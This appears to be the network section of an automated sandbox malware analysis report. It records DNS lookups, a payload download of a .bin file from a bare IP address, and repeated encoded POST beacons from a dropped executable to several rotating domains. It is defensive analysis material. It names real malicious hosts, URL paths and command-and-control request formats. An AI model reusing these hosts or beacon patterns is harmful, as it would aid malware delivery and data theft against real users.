                                                                      Nov 28, 2024 10:07:46.796545029 CET192.168.2.61.1.1.10x1fbeStandard query (0)www.thezensive.workA (IP address)IN (0x0001)false
                                                                      Nov 28, 2024 10:08:01.796549082 CET192.168.2.61.1.1.10x99e8Standard query (0)www.lucelight.infoA (IP address)IN (0x0001)false
                                                                      Nov 28, 2024 10:08:02.792721987 CET192.168.2.61.1.1.10x99e8Standard query (0)www.lucelight.infoA (IP address)IN (0x0001)false
                                                                      Nov 28, 2024 10:08:17.249871969 CET192.168.2.61.1.1.10xf5cbStandard query (0)www.kevmedia.onlineA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Nov 28, 2024 10:06:45.008178949 CET1.1.1.1192.168.2.60x4665No error (0)www.carhireheaven.onlinecarhireheaven.onlineCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 28, 2024 10:06:45.008178949 CET1.1.1.1192.168.2.60x4665No error (0)carhireheaven.online165.22.38.185A (IP address)IN (0x0001)false
                                                                      Nov 28, 2024 10:07:01.981430054 CET1.1.1.1192.168.2.60xedeNo error (0)www.dy01urj.pro154.88.22.104A (IP address)IN (0x0001)false
                                                                      Nov 28, 2024 10:07:17.198312044 CET1.1.1.1192.168.2.60xa8f1No error (0)www.openhorizons.pro69.57.163.64A (IP address)IN (0x0001)false
                                                                      Nov 28, 2024 10:07:32.000127077 CET1.1.1.1192.168.2.60x2064No error (0)www.topkapiescortg.xyz104.21.6.17A (IP address)IN (0x0001)false
                                                                      Nov 28, 2024 10:07:32.000127077 CET1.1.1.1192.168.2.60x2064No error (0)www.topkapiescortg.xyz172.67.134.42A (IP address)IN (0x0001)false
                                                                      Nov 28, 2024 10:07:47.263221979 CET1.1.1.1192.168.2.60x1fbeNo error (0)www.thezensive.workthezensive.netlify.appCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 28, 2024 10:07:47.263221979 CET1.1.1.1192.168.2.60x1fbeNo error (0)thezensive.netlify.app3.75.10.80A (IP address)IN (0x0001)false
                                                                      Nov 28, 2024 10:07:47.263221979 CET1.1.1.1192.168.2.60x1fbeNo error (0)thezensive.netlify.app3.125.36.175A (IP address)IN (0x0001)false
                                                                      Nov 28, 2024 10:08:02.874437094 CET1.1.1.1192.168.2.60x99e8No error (0)www.lucelight.info103.168.172.37A (IP address)IN (0x0001)false
                                                                      Nov 28, 2024 10:08:02.874437094 CET1.1.1.1192.168.2.60x99e8No error (0)www.lucelight.info103.168.172.52A (IP address)IN (0x0001)false
                                                                      Nov 28, 2024 10:08:02.930182934 CET1.1.1.1192.168.2.60x99e8No error (0)www.lucelight.info103.168.172.37A (IP address)IN (0x0001)false
                                                                      Nov 28, 2024 10:08:02.930182934 CET1.1.1.1192.168.2.60x99e8No error (0)www.lucelight.info103.168.172.52A (IP address)IN (0x0001)false
                                                                      Nov 28, 2024 10:08:17.834805965 CET1.1.1.1192.168.2.60xf5cbServer failure (2)www.kevmedia.onlinenonenoneA (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • 212.162.149.63
                                                                      • www.carhireheaven.online
                                                                      • www.dy01urj.pro
                                                                      • www.openhorizons.pro
                                                                      • www.topkapiescortg.xyz
                                                                      • www.thezensive.work
                                                                      • www.lucelight.info

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.649724212.162.149.63805860C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 28, 2024 10:06:15.739025116 CET181OUTGET /kybqONxtMLpRGBHO51.bin HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                      Host: 212.162.149.63
                                                                      Cache-Control: no-cache
                                                                      Nov 28, 2024 10:06:16.974071026 CET1236INHTTP/1.1 200 OK
                                                                      Content-Type: application/octet-stream
                                                                      Last-Modified: Thu, 28 Nov 2024 01:28:21 GMT
                                                                      Accept-Ranges: bytes
                                                                      ETag: "9c71cdcf3441db1:0"
                                                                      Server: Microsoft-IIS/8.5
                                                                      Date: Thu, 28 Nov 2024 09:06:17 GMT
                                                                      Content-Length: 287808
                                                                      Data Raw: c1 da be 24 81 c7 dc 68 b2 10 9e ab a9 7a a9 e5 0e 94 46 fb fb 66 ef fb 5d 2a 15 52 ba 0b 74 3e 2d 52 af fc 14 03 58 32 3e a6 f3 9f 30 8c 9b dc 8c 64 86 0a 28 61 7c 08 d3 43 33 f0 29 8c 4c 31 2f fe 8e 32 46 05 18 4c 3e 41 ec 08 a3 1a 4f aa bb 5c ff 0a c7 88 72 49 49 21 37 84 4a f8 7d 25 00 3f f2 d9 30 bb 6e 35 98 55 48 95 58 f4 a1 f6 52 b3 6a a7 0a 11 91 fc fc 83 f1 44 2f 67 f3 b6 5c 0d aa 24 54 f0 8b 90 f9 7e 02 d0 5b 69 13 d3 05 7f 1c 2a 76 3c a2 58 17 d5 1d 70 2f 35 bb 8c 52 b9 5f 7b d8 4d 3c 28 f4 92 d7 da 55 77 77 ef 55 92 49 35 a3 b9 77 47 0a 65 8e 4b 02 30 64 83 97 fb f3 b9 7b 0a af 68 32 e4 ff 5d 6a 84 6b 87 a1 63 70 b6 60 ea e1 e1 65 22 04 2d 3c 40 7a 78 4e ec 70 cb f2 37 a7 58 e8 70 6a fc 27 44 73 52 cb da aa a4 6b 7a f7 bf 98 ee 9b 1c 89 b4 24 02 68 75 e0 00 62 92 a8 ad 1e 1b 86 ab c2 ec 2f 83 28 16 6f fd a7 b6 f6 50 09 ef cb 3b 73 e0 e6 bb 9f 13 ec a7 7d 32 0f 04 29 2f 74 b2 aa 68 5d ee 68 3c 72 ea 27 e6 29 8e a8 eb 3d 75 1b 3f ae b7 b3 1d 5a 23 37 25 ec e8 6f f1 44 34 ce 66 e3 f5 db c7 [TRUNCATED]
                                                                      Data Ascii: $hzFf]*Rt>-RX2>0d(a|C3)L1/2FL>AO\rII!7J}%?0n5UHXRjD/g\$T~[i*v<Xp/5R_{M<(UwwUI5wGeK0d{h2]jkcp`e"-<@zxNp7Xpj'DsRkz$hub/(oP;s}2)/th]h<r')=u?Z#7%oD4fiZ;$F_Ti41`:c.=#ZVuVuK='V/v>?2.5FSJ#3FQmNH1)(YY082qke>7rQ(9hT5eDI .CMB,y]U!z/c&\U.Aig[@[%=}|\ZNR1e4&B![Q@XCXJtcer/ }s"19nm;<HcX<_mwj)eHzZLD[Dr-VGA}#K FCAL'eDU=}J]YA0_:{.pfQ.3L<@o"`K#K!r!Cy-.%D#:5GKll~nq5S:F|?oli~yRwnQBsID]J_Q/P_I%%o)(tpu+=uj?x^)_rMa|`NqX`f`
                                                                      Nov 28, 2024 10:06:16.974107027 CET1236INData Raw: e5 8c be e8 58 83 63 19 e1 42 b3 84 82 72 4e 3c 78 cf 49 8f ec 10 30 cc 0d 56 5d 3b f7 f2 26 15 10 cf d4 db ef 94 58 07 3c 35 98 38 f9 1a d8 49 90 d0 27 d3 a0 1b 1b 98 bd a4 60 03 40 99 51 a7 23 9c 4a d9 2e a6 16 e5 87 a0 5f 3e 2c fd 80 b9 5e 7f
                                                                      Data Ascii: XcBrN<xI0V];&X<58I'`@Q#J._>,^3CEo84o0V`"M$`RAe4.s!c-n0#>_q[R Zhjy!AP"oVq/&Xtj0WVxC$<w,e|O
                                                                      Nov 28, 2024 10:06:16.974118948 CET1236INData Raw: d4 d9 fd c2 6c c7 7e 6e cd cc 71 35 53 9e 3a 96 46 17 d3 7c b1 ff 3f 6f b2 6c ac 69 7e dc 79 dc ff c1 ba 52 77 e9 6e 51 d1 81 93 af 42 ae 9a 73 f2 13 ef 49 44 89 5d f5 4a a7 00 c6 1a e7 5f c7 51 98 2f c4 50 5f 87 b5 49 dc c6 c2 a1 eb bc fa 25 b6
                                                                      Data Ascii: l~nq5S:F|?oli~yRwnQBsID]J_Q/P_I%%o)(tpu+=uj?x^)_rMa|`NqX`f`XcBrN<xI0V];&X<58I'`@Q#J._>
                                                                      Nov 28, 2024 10:06:16.974214077 CET1236INData Raw: bf ea 14 14 ca b6 b5 e0 6d e2 10 f4 77 98 6a bd bc 91 c6 29 a0 65 48 7a 97 b4 b4 5a 4c ad 44 5b 44 72 2d ff 56 47 12 41 7d c3 ad 23 4b d5 04 0a cf 20 83 46 b7 b4 43 41 a2 4c da 27 b8 06 65 44 cb 55 3d 7f 7d 4a 5d 8a f6 a6 59 13 41 8b bd 30 5f 3a
                                                                      Data Ascii: mwj)eHzZLD[Dr-VGA}#K FCAL'eDU=}J]YA0_:{.pfQ.3L<@o"`K#K!r!Cy-.%D#:5GKll~nq5S:F|?oli~yRwnQBsID]J_Q/P_I
                                                                      Nov 28, 2024 10:06:16.974225998 CET896INData Raw: cf b6 50 01 22 da d4 c1 5b 7c 12 19 d2 93 29 97 26 1e cd 56 b9 8d 91 45 6e d9 a7 50 20 03 57 5f 60 d6 72 86 97 8e e4 8a 81 fb b5 0e 69 b5 40 b4 95 fd 08 20 2a 90 68 14 7e 09 86 43 36 1e 2d 00 b6 0e bb c2 e7 c6 bb aa 6d 42 35 15 d2 63 0b b2 05 1a
                                                                      Data Ascii: P"[|)&VEnP W_`ri@ *h~C6-mB5c q:EjJyw_>l dAu|\_X.}L#P?afmHc<_+%AYSOl\uts=Rh8bee bc.eU=]-
                                                                      Nov 28, 2024 10:06:17.004448891 CET1236INData Raw: e4 a2 b8 ba 1a b8 e6 11 8c 48 1c 3c 62 d5 f0 2e 41 8e a5 75 7d 99 37 fa 5f f2 0c ec 26 55 74 7c 34 f9 89 43 02 75 d2 6d 21 98 a3 81 ba fc 71 68 8a 99 36 1d ec a1 cb d1 a0 91 49 60 06 90 91 f9 8d e8 c8 a6 7f 66 24 10 9c cb 54 43 f7 59 4e 2d 9b 96
                                                                      Data Ascii: H<b.Au}7_&Ut|4Cum!qh6I`f$TCYN-%K8w"#J-Og}DMjqa[4J@Hg]QY*=.1GP_t(=H:Y921<.NyK~&JCtS#{QeB3
                                                                      Nov 28, 2024 10:06:17.004507065 CET1236INData Raw: 30 ce 41 34 c0 52 61 9a ab 2f 65 1a 2c eb 33 1d 7d c0 76 d2 af 12 44 ac 07 92 4f 6f 0b 68 b3 59 c8 6c 6e bb 45 35 80 63 aa c1 df f4 8b 07 cd 81 26 6b 0f 09 0a 2c 72 7b af c8 76 c4 e0 cd 2f 6e a8 11 67 5f da c6 b3 99 bb d8 87 18 26 61 4a f2 25 a6
                                                                      Data Ascii: 0A4Ra/e,3}vDOohYlnE5c&k,r{v/ng_&aJ%KNeKuhq`Mw#uAiO^=V=G->={QdP9$DfC3ct{:3p<rv#&nnL>qC5eg$7]h?|)
                                                                      Nov 28, 2024 10:06:17.004520893 CET1236INData Raw: a2 9b a8 6c 56 02 ac d6 95 df 6c ca 54 66 b1 30 fe 80 b9 51 f9 6d ac 33 ce d3 2c f3 e5 7e b4 4c 01 7d 8b b9 36 ac 6f 30 e3 56 d8 f5 11 c1 75 f3 75 e5 67 9b 58 ba 11 b9 a1 ef 7c 34 36 0c 54 b9 6a 82 20 21 c1 fd eb bf 7c 37 59 c7 eb 21 e3 94 3e c3
                                                                      Data Ascii: lVlTf0Qm3,~L}6o0VuugX|46Tj !|7Y!>z<-nMU_q0Su^,!#TbVWXv=RtOT6hNr p|SmzXSyyDOw"UM)~:a,?3rv|d<
                                                                      Nov 28, 2024 10:06:17.004638910 CET1236INData Raw: a6 2d f2 6d e2 58 f5 6c 05 f1 b1 75 bd b4 eb 2b f7 aa c6 7e c5 fa ee 1e cb a9 a3 93 a7 17 0e d7 0c 6c 2d 12 e0 9f ea db 19 04 15 90 c3 10 fa 9d fe 74 9c c5 3f cc 4a 69 fa 3b 6e da 47 6e d8 23 bb 04 bb 43 3e fb a7 ae bd d0 93 5f 2d 86 2b cd 4d fc
                                                                      Data Ascii: -mXlu+~l-t?Ji;nGn#C>_-+M:!?9#]4yIbVOW8:9UY*<{[b%O`yA*!"vH0VECLoeal"gGUsX%A.wCV
                                                                      Nov 28, 2024 10:06:17.004651070 CET1236INData Raw: c5 ee 01 37 0a 63 24 f6 af 00 49 7d d3 55 96 b7 ff 6d 89 de 04 7b d0 96 e8 71 c5 f2 87 0a a7 12 89 da 41 6d 70 31 30 86 e1 1e b7 40 11 83 01 0e 46 49 1b 8c 53 90 f6 61 b7 ce 52 32 73 2a d0 17 6e 56 7a 7a e4 ad 8d 32 ea ca db ed 77 8f 36 98 2c 60
                                                                      Data Ascii: 7c$I}Um{qAmp10@FISaR2s*nVzz2w6,`&#J`10<+]0=8!0F*d*="iw@/t2YHT&%.gTO01XT@1,2$yF{GQ_?|5-Dll"Avmz}
                                                                      Nov 28, 2024 10:06:17.094274044 CET1236INData Raw: d0 ff fc 77 62 b8 18 e7 7b f7 aa b9 53 66 92 02 e0 7f 53 d2 c7 30 e2 cd ef 8b 41 81 8e 6d 83 53 a4 5f e4 a4 d6 e8 58 cf d7 f0 56 6a ba 99 08 5c 0b f3 6f e8 d2 d1 c1 f1 8c 61 a6 ce ab 31 4d 7d 99 b6 c8 8a 96 41 71 d8 40 e3 ad ba 2c 64 d9 3e c9 ae
                                                                      Data Ascii: wb{SfS0AmS_XVj\oa1M}Aq@,d>51p4k`=T206m'gy_wQaG<0-~F}L5 FU=/?Q1y<{fC0|,(YZ$"D$I@|!}+J`]z!


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.649725165.22.38.185806404C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 28, 2024 10:06:45.145488977 CET522OUTGET /rym4/?8jT4kL=ndVa/RILK9FLDRpgtoZJ+J8IBXYKH57ZDy7Pf7hM0FMVC1dzhL8viYhuuez44cZISqlmpTXSVNjrzOBKappePk6RQICM+G+QyTBiA70rdrzzN+VPX4YC9zgU1gXoNV1ZFV83DTE=&-pmdf=w6-PZpOHNlat HTTP/1.1
                                                                      Host: www.carhireheaven.online
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Nov 28, 2024 10:06:46.268918991 CET321INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.24.0 (Ubuntu)
                                                                      Date: Thu, 28 Nov 2024 09:06:46 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 162
                                                                      Connection: close
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.649726154.88.22.104806404C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 28, 2024 10:07:02.120712996 CET764OUTPOST /f425/ HTTP/1.1
                                                                      Host: www.dy01urj.pro
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Origin: http://www.dy01urj.pro
                                                                      Referer: http://www.dy01urj.pro/f425/
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 211
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Data Raw: 38 6a 54 34 6b 4c 3d 33 71 2b 42 32 72 54 6d 48 63 79 54 69 5a 71 37 68 4a 67 52 55 6d 4b 33 66 4d 45 39 68 48 47 65 4e 69 39 39 5a 6d 35 51 73 43 4f 71 7a 42 35 41 59 51 4b 75 38 54 70 2f 4d 7a 45 50 45 4c 43 72 66 4a 34 6a 61 68 74 5a 7a 52 62 64 76 62 57 48 2b 42 52 61 71 56 35 79 5a 2f 64 67 63 7a 76 53 61 48 44 4c 76 32 41 67 2b 69 55 42 45 36 75 35 45 73 6c 4f 4f 6d 4c 71 6c 55 65 38 62 51 7a 6a 77 37 2f 44 6f 4d 52 4b 53 37 39 32 76 44 56 68 32 6b 61 75 7a 34 53 39 71 42 70 55 36 6d 42 62 36 35 7a 6f 66 7a 58 5a 73 6f 46 32 53 38 4b 4f 31 67 35 56 48 33 49 63 32 76 53 62 37 47 6f 54 4e 65 52 77 54 63 38 42 73 33 4d 56
                                                                      Data Ascii: 8jT4kL=3q+B2rTmHcyTiZq7hJgRUmK3fME9hHGeNi99Zm5QsCOqzB5AYQKu8Tp/MzEPELCrfJ4jahtZzRbdvbWH+BRaqV5yZ/dgczvSaHDLv2Ag+iUBE6u5EslOOmLqlUe8bQzjw7/DoMRKS792vDVh2kauz4S9qBpU6mBb65zofzXZsoF2S8KO1g5VH3Ic2vSb7GoTNeRwTc8Bs3MV
                                                                      Nov 28, 2024 10:07:03.718035936 CET364INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Thu, 28 Nov 2024 09:07:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 c6 be 55 be 15 3e b9 41 a6 be 2e ae e5 c9 46 9e a5 c9 1e 5e 65 fe 59 e9 a6 be 21 ae b6 ea 9a 36 fa 50 13 01 a2 05 05 cf 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 67)N.,(ON,VPV/Ji%IAf>U>A.F^eY!6PZ0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.649727154.88.22.104806404C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 28, 2024 10:07:04.790400028 CET788OUTPOST /f425/ HTTP/1.1
                                                                      Host: www.dy01urj.pro
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Origin: http://www.dy01urj.pro
                                                                      Referer: http://www.dy01urj.pro/f425/
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 235
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Data Raw: 38 6a 54 34 6b 4c 3d 33 71 2b 42 32 72 54 6d 48 63 79 54 6b 49 36 37 74 4c 49 52 53 47 4b 30 54 73 45 39 76 6e 47 43 4e 69 35 39 5a 6e 39 36 73 77 61 71 7a 68 70 41 5a 52 4b 75 78 7a 70 2f 43 54 45 4b 5a 62 44 47 66 4a 6b 64 61 67 68 5a 7a 52 50 64 76 65 71 48 2f 32 46 64 72 46 35 4b 56 66 64 69 42 44 76 53 61 48 44 4c 76 77 74 46 2b 69 4d 42 59 62 2b 35 48 4e 6c 4e 48 47 4c 70 79 6b 65 38 4b 67 7a 6e 77 37 2f 39 6f 4e 4e 67 53 39 78 32 76 43 6c 68 32 52 6d 74 6b 6f 53 37 6b 68 6f 6a 71 6e 34 63 32 35 32 6b 44 31 2f 32 33 35 46 7a 61 71 58 55 70 54 35 32 56 6e 6f 65 32 74 4b 70 37 6d 6f 35 50 65 70 77 42 4c 77 6d 6a 44 70 32 6b 43 30 57 34 4f 50 70 4a 73 32 64 73 77 70 37 39 74 53 7a 42 77 3d 3d
                                                                      Data Ascii: 8jT4kL=3q+B2rTmHcyTkI67tLIRSGK0TsE9vnGCNi59Zn96swaqzhpAZRKuxzp/CTEKZbDGfJkdaghZzRPdveqH/2FdrF5KVfdiBDvSaHDLvwtF+iMBYb+5HNlNHGLpyke8Kgznw7/9oNNgS9x2vClh2RmtkoS7khojqn4c252kD1/235FzaqXUpT52Vnoe2tKp7mo5PepwBLwmjDp2kC0W4OPpJs2dswp79tSzBw==
                                                                      Nov 28, 2024 10:07:06.378921032 CET364INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Thu, 28 Nov 2024 09:07:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 c6 be 55 be 15 3e b9 41 a6 be 2e ae e5 c9 46 9e a5 c9 1e 5e 65 fe 59 e9 a6 be 21 ae b6 ea 9a 36 fa 50 13 01 a2 05 05 cf 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 67)N.,(ON,VPV/Ji%IAf>U>A.F^eY!6PZ0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.649728154.88.22.104806404C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 28, 2024 10:07:07.447206974 CET1801OUTPOST /f425/ HTTP/1.1
                                                                      Host: www.dy01urj.pro
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Origin: http://www.dy01urj.pro
                                                                      Referer: http://www.dy01urj.pro/f425/
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 1247
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Data Raw: 38 6a 54 34 6b 4c 3d 33 71 2b 42 32 72 54 6d 48 63 79 54 6b 49 36 37 74 4c 49 52 53 47 4b 30 54 73 45 39 76 6e 47 43 4e 69 35 39 5a 6e 39 36 73 77 43 71 7a 79 52 41 59 79 69 75 77 7a 70 2f 4b 7a 45 4c 5a 62 44 2b 66 4a 38 6e 61 67 39 6a 7a 54 33 64 75 38 53 48 32 6e 46 64 6c 46 35 4b 49 50 64 6e 63 7a 75 49 61 48 53 4d 76 32 4e 46 2b 69 4d 42 59 59 57 35 52 73 6c 4e 42 47 4c 71 6c 55 65 4f 62 51 79 41 77 37 6d 47 6f 4e 35 61 53 4e 52 32 73 69 31 68 30 44 4f 74 6e 49 53 35 6a 68 6f 37 71 6d 45 54 32 35 36 53 44 78 2f 59 33 37 5a 7a 61 76 36 44 38 33 4a 50 4b 46 42 39 6a 50 4f 2f 6c 67 6b 48 46 2b 6f 4e 42 39 74 51 6c 52 6b 56 36 6c 51 42 2b 4f 4b 61 44 66 6d 2f 6f 46 6f 75 32 63 76 61 63 4d 73 70 35 45 49 41 74 51 56 70 69 4a 48 6c 35 41 31 35 71 39 56 75 45 52 4a 34 69 56 4a 78 59 46 65 48 52 49 34 71 56 78 52 6e 7a 55 45 71 67 59 58 75 4a 61 66 32 6e 2f 52 41 30 4f 30 2f 79 37 65 45 4e 73 58 44 78 31 71 57 48 32 65 32 47 6c 4b 30 66 6d 31 70 6b 48 70 47 4f 62 49 6c 61 33 31 2f 44 6c 66 54 54 52 36 [TRUNCATED]
                                                                      Data Ascii: 8jT4kL=3q+B2rTmHcyTkI67tLIRSGK0TsE9vnGCNi59Zn96swCqzyRAYyiuwzp/KzELZbD+fJ8nag9jzT3du8SH2nFdlF5KIPdnczuIaHSMv2NF+iMBYYW5RslNBGLqlUeObQyAw7mGoN5aSNR2si1h0DOtnIS5jho7qmET256SDx/Y37Zzav6D83JPKFB9jPO/lgkHF+oNB9tQlRkV6lQB+OKaDfm/oFou2cvacMsp5EIAtQVpiJHl5A15q9VuERJ4iVJxYFeHRI4qVxRnzUEqgYXuJaf2n/RA0O0/y7eENsXDx1qWH2e2GlK0fm1pkHpGObIla31/DlfTTR6OicZG8YSUyhJSAINtRaHbc6t1e0OVJSFFdtKGv+Ae81zhCjuO4CpO4lmZHLM4BA5MZNW7AVGxpwGCM3ODECeFHANWzhWeQVuIfw+E3XYQpWbmSra/84QTOl6WfCKwVYatz2IrDogESYE6HKfIEZs0+kH5TbvNpY17rnKf9xtMJw58RUBaDynbJLeoKT36RXOfKrYO3d5BEPSqK5h9/WE8cYlVm2iHkBJbd2buYwhsUkpddIj55mY269Q95Yy/zU7+MWVQTdoUoa+/GJL//R8yrNMyY6cY5XfBrc2UmQPGPC9gyuBulJN4T4FsgDH/d4aKK7xt7TdLGauZWS1/bgYJD3vHp2JPyAMjCS9vvrhZfGDvQOsnS55Fr99IY3MihyH2ubEj5cvZ72cFNFqPPvwmg8BS5mRdssZ/BkHrw56wXLUyTWAZanRSTaX9YD/taWBduBccXRSTjlHSPNqM+CXxVRwLWFudbChfja6BSKPxcyOq/CFNAhjChRD3gLRdjti52/If7BPUwroDyNzz5ewWoRWcaa9d/cXuzNo9e+DYn51tGG5y574g4R5TNCaRzO2Tcrg5kqLniZRVfNaM5KTeOJQ4b3maPG9SNP5cNNjtOa7gV2rkdSWAhG+DqCbcy/9XbV0fmDrUZ3O8XYlt/WojV3/Usg8IYViyW [TRUNCATED]


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.649729154.88.22.104806404C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 28, 2024 10:07:10.161540985 CET513OUTGET /f425/?8jT4kL=6oWh1fqdSfng0Pjmt4p2Tl7mRdUP/1qrFSh3ZEd4swSnlT4IHTKt/yR7Nn5bH6bsG60HcQ1M+zXYt/C+9G9vrVx9LvwHKTPPcluFpxFk0AZ9f6fsXKxFHhnFilmSMHOH+bDioKs=&-pmdf=w6-PZpOHNlat HTTP/1.1
                                                                      Host: www.dy01urj.pro
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Nov 28, 2024 10:07:11.716651917 CET327INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Thu, 28 Nov 2024 09:07:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Strict-Transport-Security: max-age=31536000
